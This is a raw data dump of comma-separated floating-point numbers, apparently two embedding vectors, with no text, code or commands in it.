0.0017233815,0.0070857806,0.001209942,-0.008358427,-0.010276419,0.001146483,0.007907419,0.024689736,-0.00021010071,-0.004068591,0.013914052,-0.022021236,-0.004679577,0.026205191,0.00003863702,-0.03724818,0.036161713,-0.016799893,-0.0012105611,-0.0030841543,0.0027597628,0.0040457514,0.007865544,-0.01167382,0.005373497,-0.009148523,0.006170021,-0.019974882,-0.0011195918,-0.006668838,-0.015937887,-0.033425096,-0.0076141674,0.0052162996,0.0030585686,0.017106391,-0.0023266121,0.001643349,-0.028905068,-0.0069186883,-0.006710708,-0.040364224,0.0008394749,0.004617535,0.0046812114,0.0061642127,0.005174234,-0.0025639758,0.010347219,0.0030460914,-0.0067263623,0.01626703,-0.007075941,0.04784859,0.0073532136,-0.012966189,0.006781719,-0.010172474,-0.010096606,-0.01709283,-0.025693413,0.009469051,-0.006452096,0.0085559925,0.005961621,-0.000081738624,-0.013643149,-0.01754991,0.014361461,-0.032214966,0.09441204,0.012698061,0.012050732,0.0018381623,-0.01732803,0.0117651075,0.032003418,-0.01974997,0.04604789,0.0050535835,-0.0058263955,0.00032912378,-0.011718191,-0.00036215567,-0.006236294,0.017024126,0.01647316,-0.0040993257,0.0065538236,-0.026809748,-0.0064649726,-0.0058885966,-0.0021975313,-0.01177364,0.022198873,-0.020213516,0.01606924,-0.040003944,0.0139697045,0.0137169175,-0.021121955,0.005184177,0.008810409,0.0058199507,0.03560294,-0.011722208,-0.013885757,0.023423472,-0.006774378,-0.03763071,0.027500356,-0.012510634,-0.017228639,-0.0038258426,0.01365519,-0.01100385,0.068801805,0.016942833,0.015417738,-0.01548192,0.0032883089,0.009274867,0.0112557495,0.021059146,0.00416529,-0.01706556,0.0038346285,0.011654326,0.0037842486,0.013443929,0.020680478,-0.0011422244,-0.008361029,-0.001397671,0.010984599,-0.005375116,-0.011280361,0.015863523,0.012620378,0.0015872834,-0.010567312,0.010477345,0.010974816,0.0021986335,0.0050153392,-0.0014191574,-0.0051002502,0.011081749,0.010492304,0.040191047,-0.0030389023,-0.08350011,-0.0052006426,0.21291438,0.009248669,0.023546604,0.017668972,-0.007149403,0.0022936473,-0.07933746,-0.009974036,-0.018478185,-0.009395566,-0.0024618942,-0.022406438,-0.021140102,0.009464844,0.021030424,0.0014969369,0.0003005844,-0.03961894,0.018324016,-0.011156062,0.012275787,-0.012069805,0.0019076295,0.0008052176,-0.03409384,-0.0021546648,0.025863454,-0.019173503,-0.017659718,-0.0036278062,0.0050596157,0.001998596,0.008209348,-0.0056855665,-0.010864505,-0.0053219805,0.024337731,0.0067599076,0.013242985,-0.024340324,0.002736673,0.005809153,-0.022372125,-0.024789633,-0.1558316,0.00026499396,-0.00014657117,-0.01799642,0.00436558,0.0016237064,0.020663805,-0.028125376,0.022242468,-0.058351398,-0.011532342,0.009389452,0.004579053,0.016506812,-0.003960506,-0.011221135,-0.014690027,0.011566291,0.00632775,0.0048992094,0.031128095,-0.010879831,-0.0016742558,-0.031601124,-0.0070344782,-0.0034285814,-0.004598529,0.023201989,-0.023366595,0.004629713,-0.0098526105,0.017971955,-0.006395706,-0.0016873557,-0.00039560406,-0.01878826,-0.010366211,0.0010159526,-0.008721716,-0.015207014,0.000025130623,-0.024054427,0.0018468419,0.0069761807,-0.0144849615,0.027264876,0.012206036,0.006427206,-0.0012507184,0.011490443,0.060677815,0.008633477,-0.018690914,-0.007836774,-0.0040464746,0.000247607,-0.015539825,-0.020137712,0.0051969066,0.011293084,0.0018319661,-0.029979479,-0.01376529,-0.009201643,0.022958696,-0.0040435293,-0.01101529,-0.029837836,0.0060407086,-0.005531169,-0.021409964,0.006900847,0.012623337,-0.023466809,0.013172335,0.025312744,-0.006489623,-0.024884515,0.001764722,-0.01912518,-0.019185646,-0.03245421,-0.008176318,-0.017037962,-0.006488099,0.0000417121,-0.011121542,-0.012905917,-0.0065681636,-0.01891464,0.008189121,0.00081394205,0.018612897,0.0014054729,0.005299863,-0.007377178,0.027025646,-0.006155864,-0.04593648,0.016331868,0.010793791,-0.009869211,-0.033487488,0.00094387116,-0.020287964,-0.014600834,-0.0036017231,-0.04759318,-0.005088076,-0.00706548,-0.000053377822,0.014156773,-0.005366961,-0.0178729,-0.02556816,-0.026845025,0.0001300361,0.0117804,0.0071345363,-0.0057155443,-0.014302632,-0.023205586,-0.006555759,0.0018199077,0.02571329,-0.005571708,-0.041058823,0.0029478278,0.014971374,-0.017932922,0.009309139,0.01946177,0.0031614464,0.013492765,-0.008551574,-0.0011706454,-0.035372324,-0.0059337984,-0.011626434,0.0047395225,0.0175236,-0.010099481,0.0011611739,-0.01236937,0.028662598,-0.022695178,0.017309338,0.010116369,0.005631346,-0.013892916,0.00081910664,0.034077127,-0.017029865,-0.005457567,-0.016056878,0.0955607,-0.0036326996,-0.03631531,-0.00359987,0.0040325504,0.010559817,0.015261329,-0.01425858,-0.019308064,-0.0048830123,-0.038097404,0.014299499,-0.0071217255,0.00055410666,-0.017224971,0.016069828,0.00028099367,0.036769535,0.0055154352,0.021977011,-0.0038920655,-0.01955279,-0.015216173,0.019952167,0.029300855,-0.0055185216,-0.010844347,0.004189445,0.00017509761,0.009512242,0.0097869905,0.01169456,-0.0037548458,-0.013876814,-0.0066141505,-0.032541767,-0.022363685,0.01349986,-0.013846152,0.005854612,-0.005275223,0.0096322335,0.0039930204,-0.02830486,0.035120446,-0.0033235457,-0.02283947,0.025472954,-0.020457683,0.010156811,0.003547579,0.01704376,0.01796721,-0.024705796,-0.0016054703,-0.021939056,0.013671794,-0.008984706,0.00082579564,-0.0074606054,0.025873015,-0.0071559963,-0.006676852,-0.007895202,-0.0069982833,-0.0025264553,-0.0038106896,0.008200265,0.026133873,0.0175408,-0.0054049296,-0.021809984,-0.0007592305,0.01193379,0.003993211,-0.026398828,-0.018627811,-0.00854063,-0.0049726474,-0.00014729344,0.013159784,-0.010715728,0.01696513,0.0142932525,-0.029690437,-0.062399242,-0.0020187679,-0.010819037,-0.043412805,0.01178577,0.002352067,0.028560793,0.027235534,0.006377432,0.013281463,-0.0032463311,0.009057977,0.011725172,0.015196135,0.012281039,0.013508964,0.023755424,-0.032384146,-0.014800006,0.0012256253,-0.028197123,-0.011139723,-0.016626231,-0.00781651,-0.0357213,-0.014566569,-0.00032652463,0.014582984,-0.0066852663,0.001537799,0.03848838,-0.02288796,-0.0109389005,0.0135367755,-0.012471773,-0.00016925111,-0.03160556,0.0025741914,-0.01604218,0.052683696,-0.011832837,0.004813237,-0.0015154986,-0.022634597,0.018910237,-0.019426558,0.042310804,-0.019429414,0.023164937,0.015425139,-0.006781968,0.021535777,0.024370985,-0.008314497,0.002910707,-0.007822477,0.022856185,-0.0003444599,-0.010012736,-0.0018367126,0.006173986,-0.00026882172,0.012681738,-0.012496505,-0.0051890602,-0.018156216,0.011539944,-0.007975164,0.005423546,0.0015404153,0.020738678,-0.014516826,0.008403556,0.00227439,0.0076765316,-0.021187475,0.017676609,0.0035527837,-0.0052889693,-0.004742085,0.014865129,0.020136628,-0.014719596,-0.00007239402,0.0049182097,-0.019834101,-0.027205931,0.018407466,-0.0031927512,-0.007611682,-0.00491255,-0.0021202404,-0.0032382344,-0.008617268,0.009012318,0.015423423,0.029784933,-0.023378862,-0.0001487867,0.016560012,-0.022513054,-0.01728524,0.014765295,-0.009586009,-0.006353025,-0.0054157046,0.02768722,0.00004094629,-0.008031694,-0.02892169,-0.0022992496,0.016273921,-0.018353408,0.0016301287,0.01438517,-0.001647767,0.013058931,-0.011856631,-0.06133963,0.0060583972,-0.0022726387,-0.027379896,0.0073825107,-0.022625638,-0.007092741,-0.011600158,0.0120726,-0.014403505,-0.019462932,0.028470634,-0.0019952736,0.0035538024,0.00090220344,-0.0147639625,-0.01743862,0.01314478,-0.001961805,0.015592037,0.008613255,-0.02730862,-0.019230308,-0.006968291,0.042216722,-0.004364253,-0.018680498,0.01341537,0.040887825,0.020455346,-0.0063109593,0.0027427794,-0.023181038,0.013234078,-0.0006585832,-0.029559951,0.00972967,0.019679217,0.0014281733,-0.039152075,0.0091077695,-0.0037650054,-0.016285317,-0.006950934,-0.025190273,-0.0018692865,0.027075019,-0.0053617395,-0.019813346,-0.03010338,-0.013214496,-0.0034279334,-0.02605745,0.006749915,0.0068771574,-0.009225294,-0.0045909234,-0.004143504,-0.007869359,0.0013005909,0.015943477,0.011373095,-0.010166495,-0.0072525805,0.009163866,0.0033543848,0.00399156,-0.013312516,-0.0065214355,-0.013401004,0.018636052,-0.0007673033,0.00046873896,0.02899042,-0.009341296,0.014975213,0.007116713,-0.006970198,0.013599868,0.022063727,-0.015920714,-0.0043003485,0.015086208,0.004075108,0.007019628,-0.012020465,-0.010542198,-0.016060852,0.011229348,0.016344022,0.019980147,-0.01603584,-0.020745264,0.0063042687,-0.010401922,0.033191223,0.019719196,0.013765857,-0.018525217,-0.011137013,0.0025875361,-0.0061966744,0.011405275,-0.00036304543,-0.011783174,0.016441805,-0.011817975,-0.0049427603,-0.011284407,0.0071624015,-0.021343222,-0.0031596713,-0.020324761,-0.010277383,0.01822794,0.00475655,-0.023086885,-0.006474311,0.023352245,0.019225737,0.011847162,0.018963017,-0.018177772,-0.03734418,-0.010677681,0.0020792931,0.009857003,0.019151878,-0.011059818,0.004312595,-0.106727,0.022556987,-0.0124413185,-0.01900516,0.0014457498,-0.0033220593,0.0131066255,0.10851745,-0.012784373,-0.025754143,-0.019100416,0.031489495,-0.009061352,0.0076899836,0.002001078,0.0005709463,-0.0045750733,-0.016062213,-0.0061628637,0.02457402,0.013251477,0.014068986,0.00876942,-0.0038550724,-0.008177755,0.0049113096,-0.013200664,0.010865061,0.0032586202,0.014742288,0.00030420083,0.0068245996,-0.0012606026,0.017736107,0.0039230473,0.009834882,-0.0052973125,0.0036711807,0.010644772,0.015529079,-0.0017232964,-0.0009891697,-0.004002929,0.02316966,-0.008839015,0.00037206698,0.03658194,0.0021205654,-0.0005901656,-0.0034874666,-0.00044872926,-0.0162234,0.039505288,0.015650533,-0.015637107,-0.007829494,-0.015841654,0.017777309,-0.00076232664,-0.0149829555,0.012408978,0.010792682,0.016559314,-0.023367172,-0.0017012384,0.012848385,0.006511031,-0.018324882,-0.01695432,0.005752226,-0.004362854,0.002204129,-0.001363737,0.013873178,-0.009468231,-0.013060128,0.031210177,0.0036263198,0.0064207083,0.0022715325,-0.0117962565,-0.019120742,0.0030380748,0.0060148924,0.005788244,0.006945513,-0.005544448,0.009576263,-0.014373741,-0.014726285,0.009222523,0.021244114,-0.008475294,-0.01890547,0.0008050356,0.014661385,0.008569592,0.037433118,0.0009224439,-0.004472044,0.000034043947,0.009525695,-0.015307502,-0.022736633,-0.115438975,0.0028505258,0.020339493,0.004595983,-0.018705076,-0.0050540287,0.008159679,-0.010377512,-0.003426387,0.0045256913,-0.028638832,0.0012653391,0.014944678,0.0028776983,-0.011102402,0.009668416,-0.027328534,0.018295882,0.007004295,-0.0052449196,0.02592941,0.0028222227,-0.025183197,-0.003909575,0.0130481245,0.0037619395,-0.018524045,0.017654859,0.018204004,-0.009519248,-0.00862528,0.00095624314,-0.028252028,-0.0032096175,0.0065575456,-0.017573414,0.012208833,-0.007900957,0.0069663883,0.012278076,0.011858673,-0.0035128957,-0.00030815942,0.007871066,0.0036229948,0.0039136987,-0.004802448,0.006314164,0.020965194,0.007065778,-0.005185394,-0.008126633,0.011664194,-0.017014146,-0.002254107,-0.005107374,-0.020948287,-0.0251702,-0.011051864,0.015845612,-0.006413772,0.016147476,-0.0016506121,-0.0111889,-0.00546405,0.028757626,-0.0051648137,0.001803462,0.011461598,0.00908484,-0.026371248,0.015174669,-0.0054793484,-0.00040911057,0.031097734,0.015788013,0.0045044934,0.012534231,0.033972945,0.011801759,-0.006162305,-0.00611482,-0.0072908215,0.01342371,-0.011776078,-0.018274521,0.004673107,0.00807343,0.0049630315,0.016213309,-0.00029127853,0.024157634,-0.010439498,-0.0015706818,0.0139070945,0.019833034,0.018879447,0.020733958,-0.018061997,-0.013335854,-0.032370567,-0.015489674,-0.010420117,0.01161219,-0.029326413,0.021218413,0.0035635564,-0.007044068,-0.0041774544,0.011823875,0.02643679,0.010339076,-0.010670807,0.002868133,-0.036480546,0.0022126508,0.000013146106,-0.016305096,0.00068344036,0.019941222,-0.0064863204,0.0075401794,-0.002341873,0.010522314,-0.01870031,0.0004392048,-0.013128859,0.023059707,0.012315453,-0.00015851611,-0.008446707,0.010552874,0.019511987,-0.03986639,-0.023042064,0.0032488601,-0.013365714,0.0051744897,-0.011685853,-0.004249881,-0.019963037,-0.0241917,0.01372426,0.0025691036,-0.01939127,-0.013305907,0.0058110664,0.006727991,0.021542748,0.010362405,-0.0036869266,0.0017178291,0.017543165,0.019756615,-0.0147897815,0.013642602,-0.024202416,-0.003639313,0.006454285,0.007797511,-0.002551281,0.0022538132,0.0061171274,-0.0028118684,0.0030683156,-0.010143863,0.016181864,0.0054076863,-0.0101141855,0.007848804,-0.011440046,-0.0050823013,0.0021881796,0.0087426,0.017758237,0.020400707,0.012877157,0.03161713,0.025985235,0.01829053,0.018714422,0.004441046,-0.0019350826,0.003971641,0.012583689,0.007008705,-0.010920272,0.008544467,-0.019650923,-0.014916426,0.023443328,0.004511418,-0.0029969239,-0.0056197303,0.01534825,-0.0020350665,-0.011697411,0.006944453,0.013876486,-0.029866649,-0.0028125206,0.030876473,-0.0049630012,-0.0092435675,-0.0054785316,-0.004547314,0.006893962,0.01241322,0.026150381,0.0042703734,-0.001276498,-0.0047992333,0.01185157,0.020499758,-0.0020327088,0.014054182,-0.010052883,-0.013919036,0.019149993,-0.0056816703,0.020782232,-0.012554457,0.029591762,-0.026965283,-0.000104021026,0.03201325,0.0066930316,0.013910059,0.0007471412,-0.0021256607,-0.006089015,-0.0049988218,-0.010849382,0.023324,-0.0012479996,0.021412024,-0.0042957943,-0.0055805803,0.004621918,-0.00047014005,0.006385193,0.02333882,0.02876459,0.01819881,0.013001341,0.0006977651,-0.002446537,-0.002310905,0.014382563,-0.004188176,0.006180663,-0.0182239,-0.008127589,-0.00742489,0.0048639253,0.005892408,0.030111182,0.0042710137,-0.010967246,0.0031114526,-0.022777656,-0.014122819,-0.0273498,0.017554946,-0.015719332,0.008226038,0.023248918,-0.013398961,-0.0015154538,0.009598365,-0.023460895,-0.010582023,-0.014444337,0.020532584,0.017199099,-0.010453508,-0.01848992,0.006149398,-0.021982653,-0.01471328,-0.017829562,-0.016272223,0.004392211,-0.00007650793,-0.003630049,-0.0047085783,0.006233013,-0.0072500594,-0.007402025,0.0026726753,-0.006356477,-0.005891295,0.005331793,-0.0119167315,-0.02672151,0.018437147,0.020082649,-0.011620417,0.0015422441,0.0069846176,0.006013287,0.013142711,-0.00021195051,0.0028454845,-0.024237331,-0.02983402,-0.007764323,0.015607074,-0.017697714,-0.03182184,-0.0009232028,0.010623651,0.0059096753,0.0077170883,0.007894683,-0.008372473,-0.0068431166,-0.014476233,-0.003678708,-0.01719186,-0.017693464,0.010347916,0.015456705,0.002517285,-0.000055641565,-0.0015380108,0.016092762,-0.015775863,-0.009553503,-0.018113757,0.03461161,0.056135982,-0.008233093,-0.033240024,0.0020183814,0.00062475714,0.013567474,0.015360925,0.014190973,0.013452942,0.0052468125,0.016718695,-0.00754373,-0.00939153,0.0077251694,-0.004261677,-0.008858163,0.00004624708,0.016027547,0.011079344,-0.018095598,0.004784775,-0.018716497,0.013444553,0.012747838,0.01647537,-0.018043282,-0.00073965715,0.020319358,0.007761869,-0.025602773,0.014596944,-0.025092388,-0.008619158,-0.014302714,-0.010301746,-0.018077893,0.010130636,0.002275267,-0.0032129807,-0.005658011,0.006107035,-0.017866159,-0.006515358,0.0044353246,-0.07758997,-0.007443754,0.009280311,-0.011113519,0.01947186,-0.009592056,-0.025450926,-0.0005208091,0.0013124475,0.011076143,0.01118327,-0.007221891,0.0060364995,0.03474876,0.021010166,0.0017059463,0.02146817,0.0076179304,0.007580468,-0.011226422,-0.010697021,0.025134576,0.014006135,-0.0052355523,-0.008052022,-0.003266424,-0.019549353,-0.00013481351,-0.020842263,0.0065846704,-0.0011221928,0.007962797,0.0038624697,-0.029695114,-0.015906373,0.0028901363,0.012065027,-0.0022261792,-0.00016264648,-0.036182746,-0.01110442,-0.024795672,0.028756732,0.0057413476,-0.0055202753,0.016382683,-0.019459886,0.00038459006,-0.035715807,-0.005051234,0.015423047,0.0138128,0.008083334,0.024263127,0.0022524537,0.01751226,0.019003212,-0.00025659738,0.024253298,0.0064630583,-0.020061135,0.007855774,0.0134322,-0.027315581,-0.00837712,-0.00034782608,-0.0064341016,0.022361144,0.007891633,0.00527903,-0.0029215736,-0.028567905,-0.012016457,-0.007764058,-0.009932102,0.0071620764,-0.0049958746,-0.0086922115,0.004530028,0.014202369,0.0012153347,0.010531705,0.008905818,-0.007839164,-0.0114565585,0.017781327,-0.006788271,0.01755489,0.03332348,0.005739115,-0.011862311,0.009113981,-0.011759904,-0.020064496,-0.017244278,0.012476034,-0.0012447578,-0.006201971,-0.008230288,0.010499241,-0.03507172,-0.0007279767,0.010613451,0.0022778008,0.00052479876,-0.010079822,0.0078055263,0.014464889,-0.003034213,0.013394077,-0.0036613334,0.0065070163,0.012809886,-0.0046435753,0.010123719,0.013457174,-0.014414839,0.01618026,-0.009200608,-0.005570433,-0.033538073,-0.016659029,-0.013370872,0.009222367,0.032441135,-0.01309228,0.019989124,0.005660096,-0.017299898,0.00030675984,-0.016117984,0.018343972,0.015164792,0.036419548,0.008384476,0.0087904,0.01027233,-0.010552086,-0.019496905,0.006836158,-0.006711835,-0.05654308,0.0073644314,-0.0063946466,-0.007816788,0.048831314,-0.024062054,0.000937154,-0.01347689,-0.004463686,-0.011918681,-0.02167985,0.014536905,-0.009476742,0.0038799187,-0.019161202,0.010586,-0.00026608628,-0.00699691,-0.032182157,-0.005217742,-0.0097189965,0.017179728,0.009188464,-0.021494059,-0.001221501,0.005550438,0.014157653,-0.013804633,-0.026185786,-0.019421428,-0.0054448675,0.009494561,-0.0059354203,-0.009290606,0.012153683,0.023170834,-0.003769384,0.0031201593,-0.0036941809,-0.0206541,0.01813401,-0.009440155,-0.002639831,-0.008139384,0.0075176083,-0.007510032,0.014131958,0.001268929,-0.019091066,0.010261637,0.009125003,-0.003533369,0.0073778387,-0.027712202,-0.016906422,0.016477657,-0.011727428,-0.009256308,0.011417304,-0.025886904,0.026274702,0.008713617,0.020793237,0.00885016,0.017060235,-0.00023619538,-0.0032998652,0.019450227,0.011187596,0.009645244,-0.008731654,0.01132751,0.08998677,0.031118909,-0.025533838,-0.004447666,0.0041664415,0.01715639,0.02897332,0.010831789,0.0042604813,-0.004877731,0.0013577533,-0.00169765,0.008732182,-0.012061313,-0.019525524,0.028555011,0.014291411,-0.0023866426,-0.0029885727,-0.015524246,0.018136086,-0.040034175,0.002980567,0.048255503,-0.0011532719,-0.05237171,0.009932575,0.017176718,-0.013394679,0.007373279,0.027425738,0.029342446,0.019568292,-0.017199589,-0.011448843,-0.0034094807,0.009316152,-0.0034067943,0.009149861,-0.017292188,0.022041379,0.017202726,-0.0033777077,-0.013627603,-0.0064462232,-0.00711684,0.0062685288,-0.0002561293,-0.0022841038,0.0026366427,0.01730463,0.010673279,0.0065301363,0.010787899,0.015880233,0.0044118674,-0.00080552284,-0.010673987,0.007227315,-0.0012762933,0.015795875,-0.013170082,-0.015527323,0.009043842,0.015657246,-0.0015615191,-0.004352108,-0.0027801807,-0.01934986,-0.019164596,0.023560204,-0.026705762,0.014821173,0.018821068,-0.008906165,0.014778931,-0.016526,-0.036044613,0.001420547,-0.028307663,0.007986239,0.012158924,0.0077313166,-0.018204456,0.018076444,0.021156862,0.020607203,0.013620759,0.008000841,-0.01082457,0.026361162,0.030162927,0.005512349,0.015855238,-0.030845933,-0.002277406,0.016104586,-0.027848303,-0.0034310878,0.030319853,0.0074970042,-0.015629595,-0.012851691,-0.019179454,-0.009217047,0.0026906843,0.0038377468,0.027469438,-0.004452367,0.00836561,-0.008113825,0.0012110039,-0.0071344804,-0.010599463,0.00891407,-0.0015809367,0.016174937,-0.0076429225,0.004593952,-0.012314998,-0.010286196,0.009568532,0.0023720793,0.013501756,0.0065326686,0.013166004,-0.01164534,0.0063009923,-0.012186993,-0.010111483,-0.005245993,-0.031074632,-0.017780706,-0.0040225494,-0.005733268,0.022630839,0.03698269,0.0029422278,0.021805303,-0.0047008824,0.016184863,-0.0071102423,-0.011577745,0.014679442,0.009490509,0.0048087877,0.026129194,-0.0063758898,0.020248154,0.0067452705,-0.022275519,0.014874272,-0.0012620249,-0.004276424,-0.011464884,-0.022389598,0.031228416,-0.012123244,-0.0045904987,-0.007981915,0.0045027374,0.003253201,-0.00031961722,-0.047770437,0.0061129644,0.011783489,0.012255305,0.014529319,0.006951228,0.0028324479,0.00016803617,0.004852288,-0.011729571,0.023976406,-0.0068188882,-0.013592517,0.013757773,0.004468185,-0.02095592,0.008260509,0.03018786,0.008557999,0.0062500765,0.0022250197,0.005146948,-0.000031996755,-0.019580336,0.012598944,0.016358834,0.032005098,-0.012896683,0.025327478,-0.011687651,0.020391693,0.027999965,0.004557859,-0.010062751,0.029798249,-0.024162741,-0.02593589,-0.004760975,0.003807408,0.0075462493,-0.015650637,0.023161177,0.00799937,0.012528248,0.008695391,-0.006128585,0.0031115536,0.002243149,0.015761623,-0.0038506214,-0.022591976,-0.016221447,0.0030192877,-0.029168587,-0.024295101,-0.029597057,0.010210532,0.005916176,-0.009865177,-0.015132443,-0.007862711,-0.006937535,-0.035228726,-0.006063892,0.034161292,-0.0013922863,-0.018938176,-0.0027759452,-0.003764503,-0.011086835,-0.010954261,0.0006350741,0.00457145,0.009382603,0.019282665,-0.009328277,0.016967347,0.009626542,-0.0059987972,-0.022762012,-0.013691766,-0.012225487,-0.0013818758,0.014179321,-0.0030672494,-0.020593686,-0.039746873,-0.041243184,0.016635723,-0.02394435,-0.020954365,-0.03392183,0.003908094,0.0016006532,0.010555534,0.029095171,-0.011621921,-0.009502835,0.023686547,-0.010926909,0.016465548,0.00872062,-0.00037802928,0.01987365,-0.010712255,-0.0020330374,0.0026854232,-0.029388338,-0.004678557,-0.01309647,-0.00774272,-0.0108221015,0.0013059719,-0.01894241,-0.008613636,-0.020405266,0.040899925,0.0058140326,-0.036566544,0.036241557,-0.022955151,-0.0083286045,0.0027549395,0.015869327,-0.001926603,0.017737243,-0.05307321,-0.006018051,0.01874394,-0.009181476,-0.036643248,0.032212544,-0.004274857,-0.10393448,-0.042795762,0.023546714,-0.012406747,-0.0071173217,-0.026497789,0.0072560403,-0.00452767,-0.03130941,0.00444585,0.0031484743,0.007972832,-0.009826731,0.03968691,0.010436888,-0.0029796115,0.0031186976,0.0013147085,-0.01649958,-0.010711711,-0.005952313,0.013125564,-0.0057011475,-0.0005150115,0.01885595,-0.03663596,0.0068432954,-0.026317729,0.012268344,-0.0014917144,0.0026815373,-0.027952418,-0.023057258,0.0028121525,0.0053436,-0.009249113,0.010672888,-0.0025614917,-0.014158773,0.002873857,-0.00004909288,0.15189037,0.00717201,-0.009687489,-0.01183839,-0.0122479955,-0.030326908,0.0064031533,0.018044671,-0.0028785758,0.018129593,-0.0022988373,-0.00996337,0.015090099,0.022797033,0.00013363616,-0.02555491,0.02082333,0.1182888,0.0025480937,0.006891752,0.010319031,-0.022915004,0.022323368,0.01346052,0.0019001531,-0.018514931,-0.0017656415,-0.032084856,0.014995352,-0.009084886,0.009854552,0.013277561,0.008958243,-0.0027770158,0.010689957,0.0058723562,-0.024724187,0.010699929,-0.022816814,0.01601357,0.011558663,0.005255386,-0.009856607,-0.014034602,-0.020199029,0.0104055675,-0.013989318,-0.01103386,0.009358047,0.023192845,-0.0013716781,-0.020324744,0.008276095,0.0028809495,-0.006819631,-0.006550957,-0.0034387307,-0.0016597455,-0.018219138,0.016030682,0.016555427,0.0080849,-0.002932302,0.009103022,-0.009685379,-0.011153868,0.012395606,0.009751611,-0.026410429,-0.007564038,-0.0135289775,0.009669919,-0.01187119,0.0054540182,0.010945147,-0.0028874944,-0.021256335,0.0026511676,0.0030774712,-0.015821496,0.0056665675,0.007023989,-0.023035526,-0.022992829,0.021523958,0.0137006,0.0078097405,-0.007729316,-0.01218656,0.03223571,-0.012062371,-0.0044881213,-0.0053606983,-0.0064203287,-0.00023813569,0.0014869869,-0.006632179,0.010882351,0.018232252,-0.0074867057,-0.019070964,0.009659636,0.009017543,0.024578629,-0.016843345,0.02069567,-0.008872377,0.00685851,-0.0017669874,-0.0051510227,0.004642338,0.025514193,0.008807945,0.010865557,-0.017786864,-0.013618695,0.001374798,0.008140685,-0.028523806,0.015862951,0.004982669,-0.0056813145,0.02379505,0.025638703,-0.023111105,-0.0112729715,0.014795264,-0.014685715,-0.012905983,0.012132709,-0.0131027065,0.0042312793,0.021309553,-0.013265684,0.005893658,-0.017856615,0.0008275207,-0.036168307,-0.010045598,-0.01262949,0.0051936167,0.023404403,-0.0030628857,0.0066106985,-0.008425019,-0.0039405604,-0.002290704,0.007320274],[-0.004800294,0.002247239,-0.0070991213,-0.027027765,-0.0040010563,-0.021698605,-0.021313071,0.02264113,0.023817578,-0.0050902506,0.014654265,0.031247148,-0.00392546,0.021513801,-0.0087638805,0.00572766,-0.0026056308,0.006096197,0.016056746,-0.005431171,-0.0039424757,-0.019036317,0.016730862,-0.008899477,0.015272884,0.015333087,-0.007971637,-0.0026807021,-0.0011138594,-0.008427959,0.017493226,0.023080492,0.004958624,-0.0031562936,0.0088948915,0.012106622,-0.007163294,0.0011540088,-0.0026038794,0.0056669097,0.023179676,-0.007398055,-0.018878065,0.017230636,-0.011008623,-0.024784252,-0.011515538,0.00561976,-0.017689887,0.005512838,-0.005335652,0.013877359,-0.016917909,0.016588215,-0.01811743,0.0091885235,-0.011676011,-0.025053993,0.030602284,-0.014370613,-0.019159853,0.021921877,-0.007947757,-0.005484487,0.010564775,-0.013371152,-0.0034048387,-0.008300001,-0.0061516105,-0.012706744,0.036726777,-0.015987273,-0.009482399,0.0025199614,-0.005531733,0.017268306,0.0039816927,-0.009969718,-0.015351587,-0.021968942,-0.034560304,-0.0019547308,0.0029588582,-0.011006107,0.0038346574,0.014782906,-0.0073278863,-0.0073774583,-0.008863528,0.008661763,-0.0024940006,-0.005337291,-0.009036752,0.026494099,0.00019437783,0.008507116,0.019926647,-0.0055879913,-0.003059163,-0.004439203,0.00142287,-0.004939665,0.0002349454,-0.005943046,0.0109745795,0.0017338012,-0.012029505,-0.0062988056,-0.005010011,0.003352416,-0.003952268,0.013835855,0.015089873,-0.015145233,-0.004300859,-0.017041052,0.004790494,0.010326441,-0.02227927,-0.0073891096,0.0106981825,0.00832254,0.008223816,0.0072896574,-0.01617392,-0.008953165,0.019713178,0.0044834656,-0.004791389,-0.026020292,-0.009075894,0.017678544,0.0030828086,0.00074481725,0.0010250662,-0.007739862,0.005588521,0.0010487051,0.0032568844,-0.017119968,0.030394368,0.010300996,0.021203935,0.0038034553,0.01645347,0.02383339,0.006853042,-0.0016982077,0.031388205,-0.0076000527,0.026030838,0.00933192,-0.007609581,-0.012725045,0.00527134,-0.006387409,-0.008878475,-0.01707356,-0.019635364,0.009323466,-0.004639166,-0.010595339,-0.012229896,0.029185489,-0.009203329,-0.011714028,-0.00043390068,0.009784774,-0.0032269803,0.002539305,-0.005042226,0.02884123,0.017451303,-0.005057426,0.0051734303,0.0059730015,0.002384956,-0.027795918,-0.0017167458,0.01995644,-0.0056138383,0.02611865,0.011387223,-0.008041211,-0.0065593557,0.015521184,0.00885848,0.014840467,-0.010584089,-0.0032431954,-0.005966142,-0.023595983,-0.014236146,0.0026517378,-0.0049824193,-0.0072703864,-0.0123220235,0.121677436,0.0058520543,-0.009051383,-0.019359248,-0.013347434,0.0013200757,-0.019377504,-0.021729551,-0.023625577,-0.02284006,0.009025872,0.018800635,-0.01123827,0.018212674,-0.0076098028,0.010899991,0.0012504929,0.0042560305,-0.07816362,0.014085609,0.0077711176,-0.0223545,0.003287483,0.00048759644,0.001010271,-0.019390605,-0.0058629136,-0.008788475,-0.011516636,-0.009636594,0.016570592,-0.002709809,-0.019054132,0.0066163912,-0.001134129,-0.0246425,-0.009029776,0.010196523,-0.020719916,-0.0082804775,-0.0004118419,0.0073099546,-0.0008068736,-0.0057835537,0.013702306,-0.004065217,-0.0058915364,-0.010817783,0.012538866,0.016081408,-0.00779277,-0.006254004,-0.014285867,-0.008852206,-0.007772804,0.0047059273,0.015720423,0.0015866121,-0.012275943,0.0009664306,0.00008448233,-0.006018514,0.0039321473,0.005683843,0.028009713,-0.0075979508,-0.0048672254,0.017396543,0.004695672,0.0046443595,-0.05463665,-0.009875161,-0.008827389,-0.034935154,0.008658908,0.011908409,-0.013995662,0.0147636505,0.016739586,0.04119979,-0.009045439,0.013053166,-0.012650926,-0.013507346,-0.011698613,-0.014882522,-0.0016671802,-0.012587159,-0.0023215555,0.027819684,-0.0013869356,0.025149943,0.002149409,-0.022038158,0.013089087,0.02215673,-0.00037796312,-0.013247296,-0.0050744577,-0.026005397,0.018956881,0.015678635,-0.021937523,-0.0061182748,-0.017338127,0.025706224,-0.0048237983,0.013268095,-0.00094542565,-0.0071956045,0.030586084,0.0010349695,0.004216395,-0.0049568014,-0.0041235727,-0.011284655,-0.005356592,0.031128615,0.005748137,0.033588532,-0.01584921,0.009901056,-0.00048193053,0.0130806565,-0.000016466207,-0.011394002,0.0046045873,-0.0013370223,-0.0014981218,0.019665,0.00029090658,0.015929407,-0.0034357843,0.004467778,-0.006592439,0.0024081124,0.0238,-0.027992902,0.009093849,0.004910751,0.02390347,0.0054832567,0.03330442,-0.003610286,-0.010743048,0.0018389559,-0.002052425,-0.00020270946,0.008361226,-0.011974185,-0.0041429535,0.015638208,-0.0041600806,